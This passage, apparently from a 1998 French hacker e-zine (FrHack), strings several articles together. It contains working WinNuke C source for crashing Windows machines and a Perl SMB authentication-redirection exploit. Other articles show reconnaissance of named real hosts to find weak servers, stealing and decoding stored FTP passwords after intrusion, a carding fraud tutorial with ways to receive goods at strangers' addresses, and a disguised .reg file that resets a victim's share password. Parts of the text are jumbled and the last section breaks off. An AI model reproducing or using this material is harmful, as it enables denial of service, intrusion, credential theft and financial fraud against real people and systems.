serveurs :) utile... enfais je ne sais pas si on peux faire ce que je vais vous montere avec Windows , mais vous pouver vous aseillier..enfait je pense que Winsock offre quelques commande dont je vais vous parler. Pour mapper un serveur(domaine) ce qu'il faut : -Linux (ou un system qui suporte les commandes dig,nslookup et traceroute winsock 2.0d spupporte dig.mais pour les autres commandes..??) -Patience -Courage -Petite connaissance du protocol ip / Networking / routers -Pis du temps (ce bon l'etee commence) Commandes requises utilitee man page nslookup pour trouver si le serveur qu'on veux travcer possede un Nameserveur(utile pour le spoof si on penetre le nameserveur OUI ect...) Enfait c'est pour voir quellee qualitee peut avoire notre cible.Peut aussi etre utiliser pour des chose plus ressente comme la version de bind. traceroute pour trouver d'ou provien un packet groupe de packet ou un hosts puis OUI le chemin qu'il entrprand entre les hosts. dig Pour tracer les nameservers ratcher a un reseau ressemble a nslookup mais utilise OUI un datagram different.. Bon cela semble un peux plus simple... et pour vous l'expliquer j'ai fais une mini m ap d'un serveur bien connu ViDEOTRON a MONTREAL malereusement ce n'est pas vraiment un bon network pour utiliser ses commandes car il n'utilise pas beaucoup d'authotentifications ..il se relie plustot a 2 NS principaux : dns1.videotron.net & dns2.videotron.net Mais les examples que j'ai ramaser sont asser pertinent pour comprendre..alors nous alors nous faire une petite mise en scene..: 3h am je sais pas koi faire..je surf puis je tombe sur une page qui est vulgaire ,alors jveux la pirater (ce pas vrai mais bon pour hacker il faut une motivation). Alors la page c'est www.infinit.net alors je retourne dans mon terminal linux puis je tape: F0C:/ dig www.infinit.net ; <<>> DiG 8.1 <<>> www.infinit.net ;; res options: init recurs defnam dnsrch ;; got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2 ;; QUERY SECTION: ;; www.infinit.net, type = A , class = IN ;; ANSWER SECTION: www.infinit.net. 3H IN A 207.253.106.140 # ip de la page ;; AUTHORITY SECTION: infiniT.net. 3H IN NS dns1.videotron.net. # NS de la page infiniT.net. 3H IN NS dns2.videotron.net. ;; ADDITIONAL SECTION: dns1.videotron.net. 1D IN A 205.151.222.250 # NS principaux de dns2.videotron.net. 1D IN A 205.151.222.251 # videotron ;; Total query time: 181 msec ;; FROM: F0C to SERVER: default -- 205.151.222.250 ;; WHEN: Thu Jun 18 18:56:24 1998 ;; MSG SIZE sent: 33 rcvd: 140 Bon...cela nous donne rien d'interessant pour l'instant..alors aseillier un autre commande F0C:/ tracetoute www.infinit.net 1 ts95-mtl.videotron.net (207.96.131.5) 142.344 ms 139.712 ms 168.246 ms 2 207.253.114.1 (207.253.114.1) 128.092 ms 268.464 ms 287.039 ms 3 100mbit-fe-3-1.rb01-piex.videotron.net (207.253.253.29) 208.127 ms 127.183 ms 128.085 ms 4 * vitali.videotron.net (207.253.106.129) 140.34 ms * Bon..ici nous avons eu un reponse.peu longue..mais qui peux nous aider ici on peux voire..que l'adresse rest hoster par vitali.videotron.net car c'est la dernierre addresse qui repond au traceroute.. premiere info pour le hacker il sais ou aller chercher sa page a hacker mais ce n'est pas ca que je veux faire. dumoin vous insiter a faire ..ce l'explication qui doit compter... les autres addresse sont des routers ce qui redirecter les connections tcp icmp udp au bon serveur avec le bon query. (Il est possible d'hacker des routers mais cela sera peut etre un topic dans un article futur.) ici la commande nslookup nous aidera pas.. car nous avons deja identifier les NS avec la commande dig..mais si les gens preferent nslookup c'est qu'il peux nous dire quels sont les nameservers importants et quels ne le sont pas..alors nous savons sur kel domaine consentrer nos efforts. exemple..si on fais un nslookup sur : www.yahoo.com F0C:/ nslookup -type=any www.yahoo.com Server: dns1.videotron.net # NS de mon PROViDER.. Address: 205.151.222.250 # Qui est utiliser pour faire un query # sur l'addresse demander. Server: dns1.videotron.net # Page demander Address: 205.151.222.250 # Son ip Non-authoritative answer: # Ns qui n'as pas d'interet mais qui repond # pour la page. www.yahoo.com canonical name = www9.yahoo.com Authoritative answers can be found from: # iCi on as une liste des Nameservers authoriser qui # pourrais nous etre tres utiles pour ensuite faire un # dig , traceroute sur chaque serveur. yahoo.com nameserver = ns.yahoo.com yahoo.com nameserver = ns1.yahoo.com yahoo.com nameserver = av1.yahoo.com yahoo.com nameserver = ns2.dca.yahoo.com yahoo.com nameserver = ns.europe.yahoo.com yahoo.com nameserver = ns.yahoo.ca ns.yahoo.com internet address = 204.71.177.33 ns1.yahoo.com internet address = 204.71.200.33 av1.yahoo.com internet address = 204.123.2.85 ns2.dca.yahoo.com internet address = 209.143.200.34 ns.europe.yahoo.com internet address = 195.67.49.25 ns.yahoo.ca internet address = 206.222.66.41 Bien sur ici on as vu somairement l'utilitee des des commandes mais plutot comment les exploiter . ensuite c'est la que le hacking entre en jeux.. moi meme je trouve ca endormant mais c'est avec des commandes si normales comme celle ci qu'on peux ensuite les utilisent pour toutes sortes de fins. Exemple maper un server Comment faire..simple(relatif)..on doit avoir une target comme un nameserveur puis le tracerouter..ensuite sauver les infos dans un file.. puis ensuite scanner les cibles pour des ports ouverts...sinon on continu notre scan des autre cibles j'usqu'a ce que nous trouvions le serveur avec la securitee la plus faible..Et on hack...puis si le serveur se trouve dans le meme reseau que les autres des fois on peux avoir des surprises..car souvent les networks on des hosts.deny qui interdisent au autres de rentrer dans le serveur... mais quand l'utilisateur vien du meme net block il l'accecpte..bon...hehe cela s'appelle du ip trusting.. puis plus on infiltre un reseau et plus on possede le controle et plus on peux avoir d'information. Bien sur je ne vous donnerai pas d'exemple sur cela car je ne veux pas reveler mes target mais jpeux vous dire que videotron est pas un bin bonne target ni yahoo..dumoin si vous vous aseillier chui pas responsable..mes example etais du pur hazard (i-). En conclusion mon texte peux sembler redondant(repetitif) mais dite vous que c'est avec de la repetition que l'on fini par apprendre.. (A SUiVRE) iNDEX: Pour sauver une session de dig,nslookup ou traceroute vous pouver faire ====>(ceci est un login prompt pour ceux qui avais pas catcher) F0C:/ F0C:/traceroute host.com >> file.name Si vous vouler remplacer un fichier utiliser unseul > a la place de deux.. deux copie le resultat a la fin si il y as deja qqch. MERCi.. Sites a voir www.rhino9.com (Rhino9 sekurity team) www.frhack.org (DuH) www.yahoo.com [:)] Pour me parler (iRC UNDERNET) NiCK:BiNF_ #hack.fr,#rhino9,#phreak.fr e-mail: binf_80@hotmail.com [BiNFUCKER/DW/F0C] !998 PRODUKTiON -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -= La base de registre: Comment ca marche =- (Par Utopiste) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -= Ke faire kand on a reussi à entrer dans un ordi ? =- (par Majestix) C'est la l'un des points les plus délicats existant dans la hacking, On peut: - partir (peu recommandé) - tout effacer (peu recommander aussi à part sur la machine d'un pédophile) - prendre les fichiers interressants (c'est le mieux !!) Il serait un peu bête de partir après avoir reussi un piratage, ben vous vous êtes donné du mal pour entrer et après vous partez ??? Tout effacer aussi est rigoureusement idiot! Totu d'abord bonjour l'image qu'on donne des hackers! ensuite le gars ne vous a rien fait, non, c'est pas un truk à faire! I. Ke faut-il recupérer ?? La chose la plus intelligents a faire est de recuperer les fichier *.ini ki sont presents sur la machine, comme : -ws_ftp.ini -eudora.ini ou encore: -tree.bak -lmhosts - a vous de voir ce ki est interressant !! II. Mais pourkoi les recupérer ? Ces fichiers la sont tres utiles car ils vous ddonnent acces à ce à koi la machine ke vous avez piraté a acces, comme d'autres machines, des ftp etc. III. Ke faire apres cela? Utiliser ces fichiers, komman ? les .ini de ftp sont utilisable par le même prog de FTP ( par ex: WS-ftp.ini pour WSFTP etc.) Si vous voulez utiliser ces acces ailleurs, il faudra decouvrir le mot de passe ki est le plus souvent crypté. Komman faire? eh bien: 1) utiliser Revelation de Snadboy ki permet de decouvrir ce k'il y a derriere les etoiles, vous lancez le prog de FTP et vous diriger le curseur sur les étoiles 2) vous les decrypter tout seul, la encore: komman faire ? editez le fichier .ini et regardez les PWD, ce sont les mots de passes ki sont cryptés. voici komman wsftp(saufle pro) crypte ses donnés : A=61 B=63 C=65 D=67 E=69 F=6B G=6D H=6F I=71 J=73 K=75 L=77 M=79 N=7B O=7D P=7F Q=81 R=83 S=85 T=87 U=89 V=8B W=8D X=8F Y=91 Z=93 komman g fais ? j'ai creer un nouveau log, dont le mot de passe est: ABCDEFGHIJKLM etc. et j'ai décodé rien de plus simple!!! faites en de même pour les autres prog! Le fichers lmhosts est un fichier ki est utilisé lors du piratage de certains systemes, regardez l'ip a l'interieur et cela vous donne l'ip d'une machine piratable, c pas kool ca ? ;) Et voila bon hacking !! by -=[MAJESTIX]=- '98 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -= Nuke =- (par Utopiste) Bon tout le monde savent ce qu'est le nuke, mais comme quand meme pour bien du monde ce n'est que inscrire un ip dans une boite et peser sur un bouton " nuke him " J'ai décider de vous dévoilé le fonctionnement d'un logiciel de nuke. #include #include #include /* Implémente les fonctions TCP/IP */ #define PortDeNuke 139 /* le port d'attaque */ int x, s; char *str = "FrHack"; /* n'importe quel chaine à le même effet */ struct sockaddr_in addr; struct hostent *host; int open_sock(int sock, char *server, short port) { struct sockaddr_in blah; struct hostent *he; memset((char *)&blah,'0', sizeof(blah)); blah.sin_family=AF_INET; blah.sin_addr.s_addr=inet_addr(server); blah.sin_port=htons(port); if ((he = gethostbyname(server)) != NULL) { memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length ); } else { if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) { /* Le dns est po correct, soit invalide soit le gars spoof */ printf("Impossible de transformer le nom de domaine en adresse IP"); return(-1); } } /* Se connecter à l'ordinateur que nous désirons nuker */ if (connect(sock,(struct sockaddr *)&blah,16)==-1) { /* Impossible de se connecter à l'ordinateur, fermer le socket */ printf("Impossible de se connecter à l'ordinateur"); closesocket(sock); return(-1); } /* Si il a aucune erreur alors nous somme connecter à l'ordinateur */ printf("Connecter à [%s:%d].\n",server,port); return 0; } void main(int argc, char *argv[]) { WSADATA wsaData; WORD wVersionRequested = MAKEWORD(1, 1); /* info pour l'initalisatoin de winsock */ /* Vérifier si le paramètre ip est là */ if (argc != 2) { printf("Utilisation: : %s \n",argv[0]); exit(0); } /* Initialisation de la dll Winsock */ wVersionRequested = MAKEWORD(1, 1); if ( (int err = WSAStartup(wVersionRequested, &wsaData)) != 0 ) { /* Une erreur est survenu lors de l'initialisation de la dll winsock */ printf("Impossible d'initialiser le Winsock"); exit(0); } /* Création d'une instance de socket */ if ( (s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) { printf("%d ", WSAGetLastError()); perror("socket()"); exit(-1); } open_sock(s,argv[1],PortDeNuke); printf("Envois du message... "); /* Envoyer le packetm, c'est en réalité cet ligne qui fait tout planter */ send(s,str,strlen(str),MSG_OOB); printf("La personne est théoriquement nuker\n"); /* Fermer le socket */ closesocket(s); } Je tiens à remercier _eci et _wfx pour leurs précédent code source concernant le nuke. Ce programme devrait marcher contre les os win95 et winNT 4.0, -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Le fantasmique monde du ___ _____ ____ ____ __ _ _ ___ /__/ /___ / / / ) / _ / / / / \ // /__/ //_ //_ // / /__/ / /// / / / /\\ // // __ /__/ /_//_/ /_/ \\ /___/ /_/ /_/ \\/ //_// (ecrit par vaToO) DISCLAIMER: toutes les informations contenues dans le texte suivant ne sont pas a appliquer. Elles ne vous sont soumises qu a unique but éducatif. Enfin ca,tout le monde le sait deja... Introduction ~~~~~~~~~~~~ Je suis a bout. J' peux plus supporter cette situation. Je me souviens de la derniere thune ke j' ai depense. Le souvenir est vague, ca remonte a longtemps; c'etait pour un graveur de cederom, je crois( hehe fo bien respecter la law, de temps en temps...). Depuis, j' ai pas vu la couleur d' un petit billet vert ... euh... y parait k' ils sont rouges maintenant , depuis bien longtemps..Enfin bref, la situation est insupportable. Seul moyen d' y remedier: le CaRdInG!Les newbies me diront ~c' est koi ca le cardingue?? hehe...Sacres newbies.. Le cardingue, c' est l' ~art~ de se sortir de la merde dans laquelle je suis. Ca va me permettre de depenser la thune ke j' ai pas, de m' acheter le dernier HD de 20Go a la mode pour mon PC1512 SD...Enfin bref,d'etre heureux! Sommaire ~~~~~~~~ On peut considerer cet article comme une espece de tutorial du CaRdInG,car il traite d' un peu tous les themes ki rodent autour. Ces themes sont: [~1~) La securite des numeros] [a) Un nombre immense de possibilites] [b) L' algorythme] [c) La bande magnetique] [~2~) La recherche d' un numero valide] [a) Les numeros "virtuels"] [b) Les numeros de comptes existants] [~3~) Les commandes] <voir paragraphe 5.) Operateur: "Quel est votre numero de telephone personnel?" Carder: "01-00-11-22-33" (Numero toujours occupe) Operateur: "Je vous demanderais votre numero de telephone de travail, au cas ou nous aurions besoin de vous joindre dans la journee." Carder: "Vous pouvez me joindre toute la journee au meme numero." Operateur: "Tres bien. Vous recevrez le colis sous quelques jours. Bonne journee." Carder: "Merci beaucoup.Au revoir." <<--La, vous pouvez le remercier bien fort! _________________________________________ (~5~] Le point de reception de la commande) °=======================================° faire preuve. Reperez un numero de vente par telephone(style TV Achat)ki vous interesse, Voici l' etape la plus delicate a effectuer en ce ki concerne le CaRdInG. C' est bien joli de pouvoir commander ce ke l' on veut, mais encore faut-il pouvoir recuperer les colis. Pas kestion de les faire envoyer chez soi! Ce serait dommage de voir arriver des petits hommes en bleu plutot k' un beau petit colis. Donc, pour pouvoir recuperer le colis, il existe plusieurs solutions. -La premiere solution est de trouver une maison en vente, ou une maison abandonnee depuis peu. Seul probleme: la plupart de ces maisons ont les volets fermes...A moins ke vous ne vouliez penetrer a l' interieur, il faut trouver une autre solution. Celle-ci serait de trouver une maison dont on sait ke le proprietaire est absent toute la journee. Ainsi, vous pourrez laisser un mot sur la porte des k' il sera parti, du style: "Je travaille de 8h a 20h, veuillez deposer le colis sous le Porche, je prends la responsabilite de ne pas signer le recu". Ou bien, un autre genre: "Je suis absent de 8h a 20h, veuillez deposer le colis a telle adresse, les personnes que vous trouverez sont au courant ( vous pouvez leur poser des kestions)", et la vous donnez votre veritable adresse. L' astuce est ke la compagnie a laquelle vous avez commande le colis ne connait pas votre veritable adresse, alors ke vous le recevez. Si vous vous servez du premier mot, vous n' avez plus qu' a aller chercher le colis chez le pigeon. -Une autre solution serait de donner l' adresse de gens ke vous ne connaissez pas lors la commande, puis d' aller chercher le colis chez eux plus tard, en invoquant une excuse bidon, par exemple ke vous etiez etonne de ne pas recevoir le colis, ke vous avez telephonne a la compagnie pour avoir des nouvelles, et k' ils vous ont indike l' adresse ou ils l' avaient envoye. La, soyez polis, surs de vous, et n' oubliez pas de les remercier en partant! -Une autre solution est la votre. Du moins, si vous en avez une! Mais je suis sur ke vous etes capable d' en trouver des biens meilleures... En cherchant un peu, on trouve toujours. Conclusion ~~~~~~~~~~ N' en abusez pas trop, il faut k' il m' en reste un peu... _______ \(EOF)/ ___ ___ °°°°° )(() )( ) ( )() ( ))( le savoir mene a la ) ((_)) ( ) liberte )_) ( ( (_( )( )_) _ ) ___ ____ ___ ___ (__)( ) ( ) ( _ ) (____) ( ) ( ) (__) \(_)/ )(-)( )( )O( )O( )__( )_( (_) (_) (__) (___) (___) (____) [ vatoo75@altern.org ] o(____)o °o°o°o°(Mai 1998) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- COMMENT ENLEVER LE "VIRUS" CHEVAL? LA PREMIÈRE VERSION DU CHEVAL (port 5000): Premièrement, appuyez sur CTRL + ALT + SUPPR Fermez le programme nommez mschv32.exe Quelques secondes un autre tableau apparait, recliquez sur FIN DE TACHE. Allez enlever le fichier mschv32.exe se trouvant dans \WINDOWS\SYSTEM\ Maintenant, vous n'êtes plus infecté de ce cheval! _______________________________________________________ LA DEUXIÈME VERSION DU CHEVAL (port OK): Premièrement, appuyez sur CTRL + ALT + SUPPR Fermez le programme nommez Csmctrl32.exe Quelques secondes un autre tableau apparait, recliquez sur FIN DE TACHE. Allez enlever le fichier Csmctrl32.exe se trouvant dans \WINDOWS\SYSTEM\ Maintenant, vous n'êtes plus infecté de ce cheval! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -= Un petit exploit pour NT =- (par un GURU de la sécurité) #!/usr/bin/perl # USAGE: # perl smb-not-secure.pl # for example # perl smb-not-secure.pl 192.168.2.13 192.168.2.10 # # Ce programme redigirige des autentifications d'une machinne NT vers une # autre sur un reseau local. # # Attention ce program ne marche que si vous vouz trouvez sur le meme brin # ethernet physique que la remote IP . # attention : # Ce programme est destine a l'utilisation dans un but educatif . # Et ne pourra etre utilise a d'autres fins . # l'auteur de ce programme ne pourra etre tenu responsable de l'utilisation # de ce programme. # NE l'oubliez pas, ce programme est cree dans un but educatif (pour faire # le bien) et non pas dans un autre but. # En definitif : # ce programme s'adresse au personne desirant s'informer sur la securite # informatique, ce programme ne devra pas etre redistribue mais garde a # l'usage prive. # Merci d'avance. use IO::Socket; use IO::Select; if ($#ARGV != 1) { print "Usage: redirect.pl \n"; exit 0; } my $local = $ARGV[0]; my $target = $ARGV[1]; my $smbport = "139"; my $Msg; my $netbname = "CKFDENECFDEFFCFGEFFCCACACACACACA"; print "setting up redirection from $local to $target ...\n"; $sock1 = new IO::Socket::INET(LocalAddr=>$local,LocalPort=>$smbport, Proto=>'tcp',Listen=>5,Reuse=>1); while (1) { print "listening on $local\n"; $IS = $sock1->accept() || die; $OS = new IO::Socket::INET(PeerAddr=>$target,PeerPort=>$smbport,Proto=>'tcp') || die; print "connected to $target\n"; $rs = new IO::Select(); $rs->add($IS,$OS); $first = 1; $finished = 0; while(! $finished) { ($r_ready) = IO::Select->select($rs,undef,undef,undef); foreach $i (@$r_ready) { $o = $OS if $i == $IS; $o = $IS if $i == $OS; recv($i,$Msg,8192,0); if (! length $Msg) { $finished = 1; break; } if ($first && substr($Msg,0,1) eq "\x81") { print "replacing called name\n"; $msg2 = join('',substr($Msg,0,5),$netbname,substr($Msg,37,length($Msg)-37)); send($o,$msg2,0); $first = 0; } else { if ($i == $OS) { $Msg =~ s/Paul/Oops/mg;} send($o,$Msg,0); } } } } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -= La base de registre: Comment ca marche =- (Par Utopiste) Dans les version de windows 3.11 on avait le droit a un paquet de .ini, mais avec l" arriver de windaube 95, la base de registre qui a prit une importance énorme et a pratiquement éliminer les .ini. En gros la base de registre sert a entreproser les options de configuration de l'ordinateur et des logiciels. c'est informations sont stocker dans les fichier user.dat et system.dat, le fichier system.dat comprend les informations global a tous les utilisateur et au matériel, alors que le user.dat stocke seulement les informations pour un utilisateur (c'est pour ca que chaque utilisateur de windaube peut avoir ses préférence a lui) Comment peut-on hacker avec la page de registre... c'Est simple, en allant modifier des donné de configuration à l'intérieur, on peut ainsi souvent enlever des protections , devier des outputs sur d'autre fichier, et enlever des mot de passe (vous pouvez pas toujours trouver le mot de passe, cepandant vous pouvez mettre l'option: mot de passe actif a faux...) Pour acceder a la base de registre manuellement on peut utiliser l'application: RegEdit.exe (qui vient avec windaube). Le fonctionnement est simple et amuser vous dedans voir comment c'est construit Je vous montrerai po comment aller modifier la base de registre manuellement dans cet article pour ceux qui sont intéresser aller lire l'api de windows, la fonction est writeprofilestring si je me rappelle bien (je dit ca de mémoire) Bon maintenant comment faire des fichier .reg les fichier ayant l'extension .reg mettre a jour directement la base de registre comme il le fichier mets les informations avant et apres dit a l'utilisateur qui viens de modifier la base de registre, nous somme souvent correcte dans la pluspart des cas Structure d'un fichier .reg ---------< Couper ici> ----------------- REGEDIT4 ; Ceci est un exemple fichier mettant à jour la base de registre ; les ligne commancant par un ; sont des commentaire ;======================================== ; Faire que la page de démarrage de windaube inet explorer devienne la page de frhack ;======================================== [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer] "start page"="www.frhack.org" ; la ligne [] signifi la clé, la " " avant le = est pour la sous-clé ; et le "" est pour la valeur de cet clé (en passant les "" sont obligatoire) --------< Couper ici >------------------ Bon passons a des exemple plus pratique: vous trouvez un pédophile sur internet, décider à aider la planete vous voulez scraper son ordi (Truc: comme il s'agit d'un pédophile con et lame, enlever seulement les fichier genre le command.com et marquer dans l'autoexec.bat en commentaire une note comme koi qui a des photo de pédo sur l'ordi dans tel répertoire, comme l'ordi sera scap il va aller le faire réparer et vous avez une chance sur deux que les techniciens le dénonce) Vous utiliser l'exploir netbios (yé a qq dans ce emag) pis oui, il a a son C partager (toujours possible). Cepandant un net use vous apprend qui a mit un mot de passe dessus. alors que faire ? maintenant plus besoin d'appeller le 911, vous pouvez faire de koi... (bon a condition que la personne soit d'accord pour ouvrir un fichier genre photopedo.reg (comme les .reg sont souvent inconnu il risque de dire ok ) parlons plus technique, les mot de passe des ressource partager sont dans la base de registre (hum, intéressant) il sont coder et j'ai pas encore eu le temps de vérifier l'algorithme (j'ai penser a écrire cet article 1 heure avant la sorti de frhack # 1) mais on va se simplifier la vie (l'informatique sert a ca) pis voila ce qu'on va faire: 1) se faire une ressource partager et marquer un mot de passe que l'on veut (celui qui se retrouvera sur l'ordi du gars plus tard) (on a fait le test avec frhack) (je tiens a remercier bubble qui m'a servi de cobaye pour ce test) 2) Aller dans la base de registre à la clé suivante: Local machine->software->microsoft->windows-> 3) localiser vous devriez voir deux sous-clé 1) "parm1enc"="73 C8 05 E7 10 E2" 2) "parm2enc"="73 C8 05 E7 10 E2" 73,C8,05,E7,10,E2 la premiere contient le mot de passe de lecture, l'autre de l'écriture 4) copier la valeur a quelque part pour pas l'oublier 5) créer un fichier texte (qui sera un .reg) ---------< couper ici >---------------- REGEDIT4 ; changer le mot de passe de la ressource partager C par le mot de passe frhack ; (c) Utopiste ; HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\C] "parm1enc"=hex:73,C8,05,E7,10,E2,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00 "parm2enc"=hex:73,C8,05,E7,10,E2,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 